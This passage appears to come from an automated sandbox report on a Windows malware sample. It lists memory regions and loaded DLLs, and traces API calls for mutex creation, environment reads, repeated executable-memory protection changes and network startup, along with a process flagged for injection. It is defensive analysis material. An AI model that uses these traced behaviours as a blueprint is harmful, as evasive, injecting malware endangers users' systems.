"\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1396 start_va = 0x7ff87f8e0000 end_va = 0x7ff87fa65fff monitored = 0 entry_point = 0x7ff87f92d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1397 start_va = 0x7ff87fa70000 end_va = 0x7ff87fa8bfff monitored = 0 entry_point = 0x7ff87fa737a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1398 start_va = 0x7ff87fad0000 end_va = 0x7ff87fae2fff monitored = 0 entry_point = 0x7ff87fad2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1399 start_va = 0x7ff87fc60000 end_va = 0x7ff87fcf5fff monitored = 0 entry_point = 0x7ff87fc85570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1400 start_va = 0x7ff87fd50000 end_va = 0x7ff87fdf9fff monitored = 0 entry_point = 0x7ff87fd77910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1401 start_va = 0x7ff87fe00000 end_va = 0x7ff87fefffff monitored = 0 entry_point = 0x7ff87fe40f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1402 start_va = 0x7ff880060000 end_va = 0x7ff880091fff monitored = 0 entry_point = 0x7ff880072340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1403 start_va = 0x7ff8802e0000 end_va = 0x7ff880303fff monitored = 0 entry_point = 0x7ff8802e3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1404 start_va = 0x7ff8806f0000 end_va = 0x7ff8806fbfff monitored = 0 entry_point = 0x7ff8806f27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1405 start_va = 0x7ff8807d0000 end_va = 0x7ff880800fff monitored = 0 entry_point = 0x7ff8807d7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1406 start_va = 0x7ff880830000 end_va = 0x7ff8808a9fff monitored = 0 entry_point = 0x7ff880851a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1407 start_va = 0x7ff8808f0000 end_va = 0x7ff880923fff monitored = 0 entry_point = 0x7ff88090ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1408 start_va = 0x7ff880930000 end_va = 0x7ff880939fff monitored = 0 entry_point = 0x7ff880931830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1409 start_va = 0x7ff880a40000 end_va = 0x7ff880a5efff monitored = 0 entry_point = 0x7ff880a45d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1410 start_va = 0x7ff880bb0000 end_va = 0x7ff880c0bfff monitored = 0 entry_point = 0x7ff880bc6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1411 start_va = 0x7ff880c60000 end_va = 0x7ff880c76fff monitored = 0 entry_point = 0x7ff880c679d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1412 start_va = 0x7ff880d80000 end_va = 0x7ff880d8afff monitored = 0 entry_point = 0x7ff880d819a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1413 start_va = 0x7ff880e10000 end_va = 0x7ff880e49fff monitored = 0 entry_point = 0x7ff880e18d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1414 start_va = 0x7ff880e50000 end_va = 0x7ff880e76fff monitored = 0 entry_point = 0x7ff880e60aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1415 start_va = 0x7ff880f60000 end_va = 0x7ff880f8cfff monitored = 0 entry_point = 0x7ff880f79d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1416 start_va = 0x7ff881170000 end_va = 0x7ff881198fff monitored = 0 entry_point = 0x7ff881184530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1417 start_va = 0x7ff8811a0000 end_va = 0x7ff881238fff monitored = 0 entry_point = 0x7ff8811cf4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1418 start_va = 0x7ff8812e0000 end_va = 0x7ff88132afff monitored = 0 entry_point = 0x7ff8812e35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1419 start_va = 0x7ff881330000 end_va = 0x7ff88133efff monitored = 0 entry_point = 0x7ff881333210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1420 start_va = 0x7ff881340000 end_va = 0x7ff881353fff monitored = 0 entry_point = 0x7ff8813452e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1421 start_va = 0x7ff881360000 end_va = 0x7ff88136ffff monitored = 0 entry_point = 0x7ff8813656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1422 start_va = 0x7ff881370000 end_va = 0x7ff8813b2fff monitored = 0 entry_point = 0x7ff881384b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1423 start_va = 0x7ff8813c0000 end_va = 0x7ff881445fff monitored = 0 entry_point = 0x7ff8813cd8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1424 start_va = 0x7ff881450000 end_va = 0x7ff881616fff monitored = 0 entry_point = 0x7ff8814adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1425 start_va = 0x7ff881620000 end_va = 0x7ff881c63fff monitored = 0 entry_point = 0x7ff8817e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1426 start_va = 0x7ff881c70000 end_va = 0x7ff881d24fff monitored = 0 entry_point = 0x7ff881cb22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1427 start_va = 0x7ff881d30000 end_va = 0x7ff881d46fff monitored = 0 entry_point = 0x7ff881d31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1428 start_va = 0x7ff881d50000 end_va = 0x7ff881db9fff monitored = 0 entry_point = 0x7ff881d86d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1429 start_va = 0x7ff881e70000 end_va = 0x7ff881ec4fff monitored = 0 entry_point = 0x7ff881e87970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1430 start_va = 0x7ff881ed0000 end_va = 0x7ff8820b7fff monitored = 0 entry_point = 0x7ff881efba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1431 start_va = 0x7ff8820c0000 end_va = 0x7ff882215fff monitored = 0 entry_point = 0x7ff8820ca8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1432 start_va = 0x7ff882220000 end_va = 0x7ff8822bcfff monitored = 0 entry_point = 0x7ff8822278a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1433 start_va = 0x7ff8822c0000 end_va = 0x7ff88253cfff monitored = 0 entry_point = 0x7ff882394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1434 start_va = 0x7ff882550000 end_va = 0x7ff8825aafff monitored = 0 entry_point = 0x7ff8825638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1435 start_va = 0x7ff8825b0000 end_va = 0x7ff883b0efff monitored = 0 entry_point = 0x7ff8827111f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1436 start_va = 0x7ff883b10000 end_va = 0x7ff883b7efff monitored = 0 entry_point = 0x7ff883b35f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1437 start_va = 0x7ff883b80000 end_va = 0x7ff883beafff monitored = 0 entry_point = 0x7ff883b990c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1438 start_va = 0x7ff883bf0000 end_va = 0x7ff883d0bfff monitored = 0 entry_point = 0x7ff883c302b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1439 start_va = 0x7ff883ec0000 end_va = 0x7ff884019fff monitored = 0 entry_point = 0x7ff883f038e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1440 start_va = 0x7ff884080000 end_va = 0x7ff88418afff monitored = 0 entry_point = 0x7ff8840a2300 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 1441 start_va = 0x7ff884190000 end_va = 0x7ff8841abfff monitored = 0 entry_point = 0x7ff8841931a0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1442 start_va = 0x7ff8841b0000 end_va = 0x7ff884256fff monitored = 0 entry_point = 0x7ff8841bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1443 start_va = 0x7ff8842c0000 end_va = 0x7ff884402fff monitored = 0 entry_point = 0x7ff8842e8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1444 start_va = 0x7ff884410000 end_va = 0x7ff8844d0fff monitored = 0 entry_point = 0x7ff884430da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1445 start_va = 0x7ff884920000 end_va = 0x7ff8849c6fff monitored = 0 entry_point = 0x7ff8849358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1446 start_va = 0x7ff8849d0000 end_va = 0x7ff884a0afff monitored = 0 entry_point = 0x7ff8849d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1447 start_va = 0x7ff884a10000 end_va = 0x7ff884b95fff monitored = 0 entry_point = 0x7ff884a5ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1448 start_va = 0x7ff884ba0000 end_va = 0x7ff884ba7fff monitored = 0 entry_point = 0x7ff884ba1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1449 start_va = 0x7ff884bb0000 end_va = 0x7ff884c01fff monitored = 0 entry_point = 0x7ff884bbf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1450 start_va = 0x7ff884c10000 end_va = 0x7ff884cbcfff monitored = 0 entry_point = 0x7ff884c281a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1451 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1462 start_va = 0x7ff87e310000 end_va = 0x7ff87e34ffff monitored = 0 entry_point = 0x7ff87e326c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1463 start_va = 0x7ff8797d0000 end_va = 0x7ff8797ddfff monitored = 0 entry_point = 0x7ff8797d1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1470 start_va = 0x2df0000 end_va = 0x2f3dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002df0000" filename = "" Region: id = 4615 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 4616 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 4617 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Thread: id = 66 os_tid = 0xfc4 Thread: id = 67 os_tid = 0xbdc Thread: id = 68 os_tid = 0x127c Thread: id = 69 os_tid = 0x1384 Thread: id = 70 os_tid = 0x1378 Thread: id = 71 os_tid = 0x1368 Thread: id = 72 os_tid = 0x900 Thread: id = 73 os_tid = 0x5f4 Thread: id = 74 os_tid = 0x238 Thread: id = 75 os_tid = 0xc44 Thread: id = 76 os_tid = 0xfe8 Thread: id = 77 os_tid = 0xcf8 Thread: id = 78 os_tid = 0xf6c Thread: id = 79 os_tid = 0xb48 Thread: id = 80 os_tid = 0xfe0 Thread: id = 81 os_tid = 0x5a0 [0126.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x14c7f0 | out: HeapArray=0x14c7f0*=0x500000) returned 0x6 [0126.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3da0) returned 0x5be1850 [0126.586] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14c5d0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0126.666] RtlIntegerToChar (in: Value=0x7e4, Base=0x0, Length=0x20, String=0x14cbb0 | out: String="2020") returned 0x0 [0126.667] RtlIntegerToChar (in: Value=0x69f02663, Base=0x0, Length=0x20, String=0x14cbb0 | out: String="1777346147") returned 0x0 [0126.667] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="S-1-5-21-1560258-20201777346147") returned 0x840 [0126.667] GetLastError () returned 0x0 [0126.715] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14c360 | out: Value="RDhJ0CNFevzX") returned 0x0 [0126.776] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x14c660 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0126.986] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820dcad0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820dc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0126.996] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820dcad0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820dc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0127.056] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820e2df0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820e2000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0127.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820e2df0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820e2000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0127.114] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820dc540, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820dc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0127.125] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820dc540, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820dc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0127.173] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820dc670, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820dc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0127.183] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ff8820dc670, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ff8820dc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0127.239] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ff8741090c0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x40, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ff874109000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x20) returned 0x0 [0127.249] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ff8741090c0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x20, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ff874109000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x40) returned 0x0 [0127.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ff87410a5b0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x40, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ff87410a000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x20) returned 0x0 [0127.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ff87410a5b0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x20, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ff87410a000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x40) returned 0x0 [0127.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ff880f65330, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x40, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ff880f65000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x20) returned 0x0 [0127.867] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ff880f65330, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x20, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ff880f65000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x40) returned 0x0 [0127.907] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x14c5de, cbSize=0x14c5b0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0x14c5b0) returned 0x0 [0128.030] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x14c9b0 | out: lpWSAData=0x14c9b0) returned 0 Process: id = "9" image_name = "yahoomessenger.exe" filename = "c:\\program files (x86)\\windows sidebar\\yahoomessenger.exe" page_root = "0x619ec000" os_pid = "0x10e8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\yahoomessenger.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1487 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1488 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1489 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1490 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1491 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1492 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1493 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1494 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1495 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1496 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1497 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1498 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1499 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1500 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1501 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1502 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1503 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1504 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 1505 start_va = 0xa80000 end_va = 0xb3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1506 start_va = 0xb50000 end_va = 0xb66fff monitored = 0 entry_point = 0xb514a1 region_type = mapped_file name = "yahoomessenger.exe" filename = "\\Program Files (x86)\\Windows Sidebar\\yahoomessenger.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\yahoomessenger.exe") Region: id = 1507 start_va = 0xb70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 1508 start_va = 0x2080000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1509 start_va = 0x2090000 end_va = 0x2a53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002090000" filename = "" Region: id = 1510 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1511 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1512 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1513 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1514 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1515 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 